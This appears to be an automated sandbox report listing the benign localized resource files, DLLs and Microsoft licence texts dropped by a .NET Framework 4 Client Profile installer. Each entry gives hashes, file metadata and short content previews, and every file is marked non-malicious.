                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S.e.t.u.p. .k.a.n. .n.i.e.t. .w.o.r.d.e.n. .u.i.t.g.e.v.o.e.r.d. .i.n. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t.e.i.t.s.m.o.d.u.s... .R.a.a.d.p.l.e.e.g. .h.e.t. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.e.e.s.m.i.j.-.b.e.s.t.a.n.d.&.l.t.;./.A.&.g.t.;. .v.o.o.r. .m.e.e.r. .i.n.f.o.r.m.a.t.i.e..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):19288
                                                                                                                                                                  Entropy (8bit):5.101791972320269
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3124Y0WDDkowwX8OZjv1t2WlLeWvLXci2jpvc:lYZhzMi2jpvc
                                                                                                                                                                  MD5:76D6E9F15D842E6A56EE42C9C5CCABCA
                                                                                                                                                                  SHA1:36E6FA7C032F69DEA2C34B5934AC556AAE738CBB
                                                                                                                                                                  SHA-256:A961DE62DA74B05EAF593BB78A4A5A4C5586FE2D0D4A45D99675D03E7F01D7C5
                                                                                                                                                                  SHA-512:F9E04AA073EBF98BDD13F6A0A9214DDA42CD5FDFEC24873CF171B77D31408CA6698BF0C9D931A93BDD7A54FE55A9E6394F2C8050C7E847455E4A36585E36D6EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........0...............................................P......ky....@.......................................... ...,...........4..X............................................................................................text...G...........................@..@.rsrc....0... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1043\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3546
                                                                                                                                                                  Entropy (8bit):5.203062637938479
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rTBfrnjTsVT08DfQhtJlIcm3wEM8LPMpDlGu3x+O0H+Ozo+SBT+OZt6S2:ZfLltGwEMAPOkukO0eONNOT2
                                                                                                                                                                  MD5:305AE79EC7D0E8D1F826D70D7D469BB4
                                                                                                                                                                  SHA1:BBE8FFD83FCA6C013A20CDEE6EA0AFFD988C4815
                                                                                                                                                                  SHA-256:69537AEF05EDFB55EC32897B3DD59724A825FDDECCD92BDD5E8840CB92B1B383
                                                                                                                                                                  SHA-512:A7368CEC366E8F717F3FD51FA71133A02C5E7B44D095B849320E15F8D95DC1A58AB977FA9A4C1633FCD1AD82D929FF8FB2271C816BE8B2B8892D7389E3E3EACD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b\f0\fs20 AANVULLENDE LICENTIEVOORWAARDEN VOOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS\lang1033\f1\par..\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS \par..EN GERELATEERDE TAALPAKKETTEN\lang1033\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b0\f0 Microsoft Corporation (of, afhankelijk uw locatie, een van haar gelieerde ondernemingen) geeft dit supplement aan u in licentie.\lang1033\b \lang1043\b0 Als u een licentie hebt voor het gebruik van Microsoft Windows

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1044\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (653), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79296
                                                                                                                                                                  Entropy (8bit):3.5898407770439955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wn2IhI4z6T1sHCqeHveRWUw+KbGpK+9C/E6b2NJBf2OEuv:V9hI4z6T1siqeHveRhAo9CM6b2NJBuOD
                                                                                                                                                                  MD5:120104FA24709C2A9D8EFC84FF0786CD
                                                                                                                                                                  SHA1:B513FA545EFAE045864D8527A5EC6B6CEBE31BB9
                                                                                                                                                                  SHA-256:516525636B91C16A70AEF8D6F6B424DC1EE7F747B8508B396EE88131B2BB0947
                                                                                                                                                                  SHA-512:1EA8EB2BE9D5F4EF6F1F2C0D90CB228A9BB58D7143CCAFE77E18CE52EC4ACA25DDE0BA18430FD4D3D7962D079CCBE7E2552B2C7090361E03C6FDFB7C2B9C7325
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.s.j.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k.j...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.m.o.d.u.s... .H.v.i.s. .d.u. .v.i.l. .h.a. .m.e.r. .i.n.f.o.r.m.a.s.j.o.n.,. .s.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.k.t.i.g.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17752
                                                                                                                                                                  Entropy (8bit):5.209166644217636
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:cNeu+Oeu+Oeu+rW56qxYBlgFAcUm/rW9eWoLXci2jpv72:TIxYBegm/WgMi2jpv72
                                                                                                                                                                  MD5:BACEA57A781C43738A3B065103479BB5
                                                                                                                                                                  SHA1:45E277CC370150293252535D5371B2C0F79B4874
                                                                                                                                                                  SHA-256:8B372354A54643F1159FAB562D0F2DFE21F08A3D67DBB7337242846316D3BEC4
                                                                                                                                                                  SHA-512:CD0BB774D1373A7B735AE9A867387527DAB28D7635B5DE881F92B66ECD87DA4E8F4605F3DF093294CA3060F993220472D3C926780BEB57BF3E90ECC081F0F1E1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P.......H....@.......................................... ..t'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1044\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1044
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3046
                                                                                                                                                                  Entropy (8bit):5.1859499604057495
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:rPN3nffnyzInT7BjTgLDRn0l392N4S2ZOMb5XgNRc9q5QB34pg5lqM9TX/ufMpDn:rPBffyUnT7BjTADRn0lN2N4S2wG5wNRq
                                                                                                                                                                  MD5:830EBCED0F03F267EEE7A5167C4E91A4
                                                                                                                                                                  SHA1:740075166941E5623ECB488B0390F25A84FEEC77
                                                                                                                                                                  SHA-256:2D0B46674BB383A56E6061D25F0D446C8B50C83C92269A3FCCB657429E9EF4BE
                                                                                                                                                                  SHA-512:CD146C8F35C1095E142EEDF2B486A22593A417138CAE35FBA00DEFB5395D6DAA34C84B6A345AE88A5B365D4E17190FD3C7F3AA384D2D4472E0413F432280F53E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1044\deflangfe1044{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 TILLEGGSLISENSVILK\'c5R FOR MICROSOFT-PROGRAMVARE\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0\fs22 MICROSOFT .NET FRAMEWORK 4 FOR MICROSOFT WINDOWS-OPERATIVSYSTEM\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4-KLIENTPROFIL FOR MICROSOFT WINDOWS-OPERATIVSYSTEM\par..OG TILKNYTTEDE SPR\'c5KPAKKER\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0\fs20 Microsoft Corporation (eller, avhengig av hvor du bor, et av dets tilknyttede selskaper) lisensierer dette tillegget til deg.\b \b0 Hvis du er lisensiert til \'e5 bruke Microsoft Windows-operativsystemprogramvare (som dette tillegget gjelder for) (\ldblquote programvaren\rdblquote ), har du r

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1045\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (691), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82374
                                                                                                                                                                  Entropy (8bit):3.6806551409534465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:lz2ue+xTxXUpUqTvvUOfUs6LArUpFymrqQtr8BAyfO4RkSzXunasvJH2TF0wpYl7:lz2ue+xTxXUpUOvvUOfUs6LqTavdJkUr
                                                                                                                                                                  MD5:BDB583C7A48F811BE3B0F01FCEA40470
                                                                                                                                                                  SHA1:E8453946A6B926E4F4AE5B02BA1D648DAF23E133
                                                                                                                                                                  SHA-256:611B7B7352188ADFFD6380B9C8A85B8FF97C09A1C293BB7AC0EF5478A0E18AC8
                                                                                                                                                                  SHA-512:27B02226F8F86CA4D00789317C79E8CA0089F5B910BED14AA664EEAB6BE66E98DE3BAFD7670C895D70AB9C34ECE5F05199F3556FDDC1B165904E3432A51C008D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.a.t.o.r. .n.i.e. .m.o.|.e. .d.z.i.a.B.a... .w. .t.r.y.b.i.e. .z.g.o.d.n.o.[.c.i... .A.b.y. .u.z.y.s.k.a... .w.i...c.e.j. .i.n.f.o.r.m.a.c.j.i.,. .z.o.b.a.c.z. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.P.l.i.k. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.2854545598714635
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fa1YUfwxWVxSIn+hnISv7N/blaRr26WneWAQKPnEtObMacxc8hjeyveCXW:iN2Gan9xblaRr26WneWALXci2jpvQ
                                                                                                                                                                  MD5:550C79640EEE713C73EB67B0736A92E6
                                                                                                                                                                  SHA1:51656BB182048F0ABFC57DC2DF9703D59E264442
                                                                                                                                                                  SHA-256:F90002DA2068F868D5A710444EA30F91AE2229DBEB660166C1E28935E4AB6078
                                                                                                                                                                  SHA-512:F90A9A5C399DEC2649E8EC088139E5FE4DD0419BDF7B5988BE8F437A35040A1E0D2F03D326B8C38B2F4F1CFDBE0269445120D95061BD691296E7C9B20C5EAC31
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P............@.......................................... ...(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1045\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4040
                                                                                                                                                                  Entropy (8bit):5.362038982382671
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rTBfQaJRTIRTjzH+oDgQUoIs89FcG5ywI5Et/+TMm9MpDcA/+MvsNcUOsG9jeLdp:Zfo+Bs18ncG5Y5Et/+Z9OwAjs7OtRwdp
                                                                                                                                                                  MD5:BB93B108D4BE954133380F7709E7BA1E
                                                                                                                                                                  SHA1:34376037B3C5879142796A2F524E5B3EA6097ED1
                                                                                                                                                                  SHA-256:4F2D6A8979C89592877555FE8F576D5F631132452AFE86114D35E9531A1CA948
                                                                                                                                                                  SHA-512:69C60EF8C0E6A8F7A92EC9A9C94C99F6DDE39477D8DEE041ABF7A164025D7EBFC9F0C7399AD8C9ED150861B00FC47F1F1CB40BB245AA87ED7904B1BAE6A4271B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1045\b\f0\fs20 UZUPE\'a3NIAJ\'a5CE POSTANOWIENIA LICENCYJNE DOTYCZ\'a5CE OPROGRAMOWANIA MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 DLA SYSTEMU OPERACYJNEGO MICROSOFT WINDOWS\f1\par..\f0 PROFIL KLIENTA PROGRAMU MICROSOFT .NET FRAMEWORK 4 DLA SYSTEMU OPERACYJNEGO MICROSOFT WINDOWS\par..I POWI\'a5ZANYCH PAKIET\'d3W J\'caZYKOWYCH\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Microsoft \lang1045 Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jeden z\~podmiot\'f3w stowarzyszonych Microsoft Corporation) udziela Licencjobiorcy

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1046\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (669), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80738
                                                                                                                                                                  Entropy (8bit):3.581949939963976
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wl7DAQput9emRem6cvMOem6QemIAY/YEQTeQoqk7EHd9nKxXq5fKsLaG5m73Rdv:geOeqeCe1CkyJtG07g
                                                                                                                                                                  MD5:A03D2063D388FC7A1B4C36D85EFA5A1A
                                                                                                                                                                  SHA1:88BD5E2FF285EE421CCC523F7582E05A8C3323F8
                                                                                                                                                                  SHA-256:61D8339E89A9E48F8AE2D929900582BB8373F08D553EC72D5E38A0840B47C8A3
                                                                                                                                                                  SHA-512:3A219F36E57D90CA92E9FAEC4DFD34841C2C9244DA4FE7E1D70608DDE7857AA36325BDB46652A42922919F782BB7C97F567E69A9FC51942722B8FD66CD4ECAF0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".N...o. ... .p.o.s.s...v.e.l. .e.x.e.c.u.t.a.r. .a. .i.n.s.t.a.l.a.....o. .e.m. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d.e... .P.a.r.a. .o.b.t.e.r. .m.a.i.s. .i.n.f.o.r.m.a.....e.s.,. .c.o.n.s.u.l.t.e. .o. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.q.u.i.v.o. .L.e.i.a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.203641313145023
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:zjkTnUfwVWwwZFf7TOS7LDoKGslNDGf8BjWNeWSQKPnEtObMacxc8hjeyveCXKuj:zom6QT7FprmmWNeWSLXci2jpv3j
                                                                                                                                                                  MD5:86CB58F2B6BC1174D200D0ABE5497233
                                                                                                                                                                  SHA1:F1174409A44D922C23F376C6BC7609BBDAD5016C
                                                                                                                                                                  SHA-256:DD7FB50E88355F46D619D89E47D3057ACC1C069178BA81839970BB13479FCF4C
                                                                                                                                                                  SHA-512:AD4C9124F2459FB83C977B235B7ACDDA86AFAEBE9FEBD8BE084AA50E87AB091331A8724EC517D5096487970A3992C7E3D255CDA31DC494544CABA5DEF9C93DD1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......E.....@.......................................... ...(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1046\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                  Entropy (8bit):5.188584376027454
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rTBfAlMu9fTp/9fTdIDsGJ1KlhREerHr7uStmESWp55ztFuMpDl/BRwZ+qf+J4Ed:ZfeuqhGeHVIErn1zuO9BC8q2WEHt+B2
                                                                                                                                                                  MD5:E43708161843A33D34D6FDF966D36397
                                                                                                                                                                  SHA1:2E5C0450CEBD9A737A90908EEDDAAE2D0B3E2940
                                                                                                                                                                  SHA-256:0AF1F04F416712387BF87C93FA846B4E8EB0AC25E284A2A3578C58E2724E2778
                                                                                                                                                                  SHA-512:FB334D29BBBC2D19D20C5260C55BF83D9D6D242C6A8F04AC88F8280A63E6AF32FB5D96703E43D39F6863D17B27D9E0E36CBAB1099127E5FA281255A19AE39E0D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1046\b\f0\fs20 TERMOS DE LICEN\'c7A COMPLEMENTARES PARA SOFTWARE DA MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1046\f0 MICROSOFT .NET FRAMEWORK 4 PARA SISTEMA OPERACIONAL MICROSOFT WINDOWS\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\lang1046\f0 PERFIL DO CLIENTE DO MICROSOFT .NET FRAMEWORK 4 PARA SISTEMA OPERACIONAL MICROSOFT WINDOWS\line\par..E PACOTES DE IDIOMAS ASSOCIADOS\lang1033\b0\f1\fs22\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1046\f0\fs20 A Microsoft Corporation (ou, dependendo do local em que voc\'ea esteja domiciliado, uma de suas afiliadas) fornece a voc\'ea a licen\'e7a deste supleme

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1049\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (712), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):81482
                                                                                                                                                                  Entropy (8bit):4.270033694989682
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w7iPuXsPXBUhOLGvVVA5/Fpn9zJop9TE+zkX6JS/5cGhj/6v:MP5XyZVrJF
                                                                                                                                                                  MD5:349B52A81342A7AFB8842459E537ECC6
                                                                                                                                                                  SHA1:6268343E82FBBABE7618BD873335A8F9F84ED64D
                                                                                                                                                                  SHA-256:992BF5AEB06AA3701D50C23FA475B4B86D8997383C9F0E3425663CFBD6B8A2A5
                                                                                                                                                                  SHA-512:EF4CBD3F7F572A9F146A524CFBC2EFBD084E6C70A65B96A42339ADC088E3F0524BC202548340969481E7F3DF3AC517AC34B200B56A3B9957802ABD0EFA951C49
                                                                                                                                                                  Malicious:false
